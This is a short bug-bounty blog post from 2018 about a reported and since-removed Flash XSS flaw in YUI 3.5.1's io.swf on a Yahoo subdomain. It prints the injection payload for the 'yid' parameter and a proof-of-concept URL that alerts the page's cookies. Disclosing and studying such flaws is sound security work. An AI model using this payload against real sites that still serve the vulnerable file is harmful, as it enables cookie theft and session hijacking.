Mar 31, 2018

XSS in Yahoo Subdomain

Advertisement



 Flash XSS in Subdomain ( https://yef.grants.yahoo.com )

Hello everyone This is my first Blog 
about find an XSS in Yahoo 

Sure Its hard to Get an XSS in Yahoo.com 
So I started in the Subdomians 

I've found this Small Bug :) 
 Yui  Version 3.5.1  on this Subdomian 
https://yef.grants.yahoo.com 
and it have XSS Vulnerability in flash files

The Bug was reported about  5 months ago 
and 
The fix they removed this subdomain

https://yef.grants.yahoo.com/yef/lib/3.5.1/build/io-xdr/io.swf

Payload :
?yid=/%22))%3B%7Dcatch(e)%7Balert(%27XSS%27)%3B%7D//


POC :  https://yef.grants.yahoo.com/yef/lib/3.5.1/build/io-xdr/io.swf?yid=/%22))%3B%7Dcatch(e)%7Balert(document.cookie)%3B%7D// 

Reward : 600$




Share This
Previous Post
Next Post

Security Researcher at Many Websites - Bug Hunter - Civil Engineer Student

0 comments: